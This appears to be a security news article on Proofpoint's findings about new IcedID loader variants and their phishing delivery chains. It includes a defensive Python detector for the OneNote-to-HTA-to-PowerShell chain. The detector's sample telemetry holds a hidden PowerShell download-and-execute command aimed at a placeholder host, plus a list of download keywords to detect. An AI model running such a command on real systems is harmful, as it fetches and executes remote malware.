
New IcedID variants have been found that lack the usual online banking fraud functionality and instead focus on installing further malware on compromised systems.

According to Proofpoint, these new variants have been seen used by three distinct threat actors in seven campaigns since late last year, focusing on further payload delivery, most notably ransomware.

Proofpoint has identified two new variants of the IcedID loader, namely “Lite” (first seen in November 2022) and “Forked” (first observed in February 2023), both delivering the same IcedID bot with a narrower feature set.

Removing unneeded functions from IcedID, which has been deployed in numerous malicious campaigns without many code changes since 2017, makes it stealthier and leaner, which can help the threat actors evade detection.

Separate clusters of IcedID activity (Proofpoint)

New IcedID campaigns

Starting in November 2022, the “Lite” variant of the IcedID loader was delivered as a second-stage payload on systems infected by the newly returned Emotet malware.

The “Forked” version of the malware loader first appeared in February 2023, distributed directly through thousands of personalized invoice-themed phishing emails.

These messages used Microsoft OneNote attachments (.one) to execute a malicious HTA file that, in turn, runs a PowerShell command which fetches IcedID from a remote resource. At the same time, the victim is served a decoy PDF.
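The delivery chain described above (OneNote attachment, embedded HTA, PowerShell download) leaves a recognizable parent/child process lineage in endpoint telemetry. The following is an added example, not code from the original article or from Proofpoint, showing how a defender could flag that lineage in process-creation events. The event format, the process names (onenote.exe, mshta.exe for the HTA, powershell.exe) and the sample events are assumptions constructed for this illustration; a real deployment would map the fields onto whatever EDR or Sysmon data is available.

```python
"""Flag the OneNote -> HTA -> PowerShell process chain in process-creation
telemetry.  Added example: the event schema, process names and sample
events below are constructed assumptions, not data from the article."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Sequence, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name, lower-cased on ingest
    cmdline: str


# Parent-first chain implied by the campaign description: OneNote opens the
# attachment, the embedded HTA runs under mshta.exe, which launches
# PowerShell to fetch the loader from a remote resource.
SUSPICIOUS_CHAIN: Tuple[str, ...] = ("onenote.exe", "mshta.exe", "powershell.exe")

# Command-line fragments that suggest a remote fetch (heuristic, not exhaustive).
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "http")


def build_index(events: Iterable[ProcEvent]) -> Dict[int, ProcEvent]:
    """Index events by PID so parents can be looked up in O(1)."""
    return {e.pid: e for e in events}


def ancestry(event: ProcEvent, index: Dict[int, ProcEvent], depth: int = 8) -> List[str]:
    """Return image names from the process up through its ancestors (leaf first).

    Stops at an unknown parent, at `depth` hops, or on a PID cycle (PIDs can
    be reused, so a naive walk could loop).
    """
    chain: List[str] = []
    cur: Optional[ProcEvent] = event
    seen = set()
    while cur is not None and len(chain) < depth and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur.image)
        cur = index.get(cur.ppid)
    return chain


def has_ordered_subsequence(seq: Sequence[str], sub: Sequence[str]) -> bool:
    """True if every element of `sub` appears in `seq` in order, not
    necessarily adjacently (so an intermediate cmd.exe does not hide the chain)."""
    it = iter(seq)
    return all(any(x == s for x in it) for s in sub)


def find_alerts(events: Sequence[ProcEvent], chain: Tuple[str, ...] = SUSPICIOUS_CHAIN) -> List[dict]:
    """Return one alert per process whose lineage matches `chain`."""
    index = build_index(events)
    alerts = []
    for e in events:
        if e.image != chain[-1]:
            continue
        lineage = list(reversed(ancestry(e, index)))  # root -> leaf
        if not has_ordered_subsequence(lineage, chain):
            continue
        cmd = e.cmdline.lower()
        alerts.append({
            "pid": e.pid,
            "lineage": lineage,
            "download_hint": any(h in cmd for h in DOWNLOAD_HINTS),
        })
    return alerts


# Constructed sample telemetry: one malicious chain plus two benign siblings.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "onenote.exe", r'onenote.exe "C:\Users\u\Downloads\invoice.one"'),
    ProcEvent(300, 200, "mshta.exe", r"mshta.exe C:\Users\u\AppData\Local\Temp\inv.hta"),
    ProcEvent(400, 300, "powershell.exe",
              "powershell.exe -w hidden -c IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/loader')"),  # placeholder URL
    # benign: user launched PowerShell directly from Explorer
    ProcEvent(500, 100, "powershell.exe", "powershell.exe -NoProfile"),
    # benign: OneNote handed the decoy PDF to a reader
    ProcEvent(600, 200, "acrord32.exe", "acrord32.exe decoy.pdf"),
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert)
```

Only the PowerShell process under mshta.exe under onenote.exe is reported; the PowerShell launched from Explorer and the decoy PDF reader are not. The subsequence match rather than an exact parent check keeps the rule from being bypassed by an extra cmd.exe hop, and the cycle guard in ancestry matters in practice because PIDs are reused.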

Malicious OneNote attachment used in recent campaign (Proofpoint)

At the end of February, Proofpoint’s researchers observed a low-volume campaign distributing IcedID “Forked” via fake notices from the National Traffic and Motor Vehicle Safety Act and the U.S. Food and Drug Administration (FDA).

It is important to note that while some threat actors use new variants of the IcedID malware, others still choose to deploy the “Standard” variant, with one of the most recent campaigns dating March 10, 2023.

The new variants

The “Forked” IcedID loader is quite similar to the “Standard” version in terms of its role: it sends basic host information to the C2 and then fetches the IcedID bot.

However, “Forked” uses a different file type (COM Server) and features additional domain and string-decryption code, making the payload 12KB larger than the “Standard” version.

Domain decryption (Proofpoint)

On the other hand, the “Lite” loader variant is lighter, at 20KB, and does not exfiltrate host information to the C2. This change makes sense given that it was deployed alongside Emotet, which had already profiled the breached system.

The “Forked” version of the IcedID bot is 64KB smaller than the “Standard” bot, and is basically the same malware minus the web injects system, the AiTM (adversary in the middle) functions, and the backconnect capabilities that give threat actors remote access to infected devices.

Standard and Forked bot comparison (Proofpoint)

IcedID is generally used by threat actors for initial access, so the development of new variants is a worrying sign that points to a shift toward specializing the bot for payload delivery.

Proofpoint predicts that most threat actors will continue to use the “Standard” variant, but the deployment of new IcedID versions will likely grow, and more variants may pop up later in 2023.
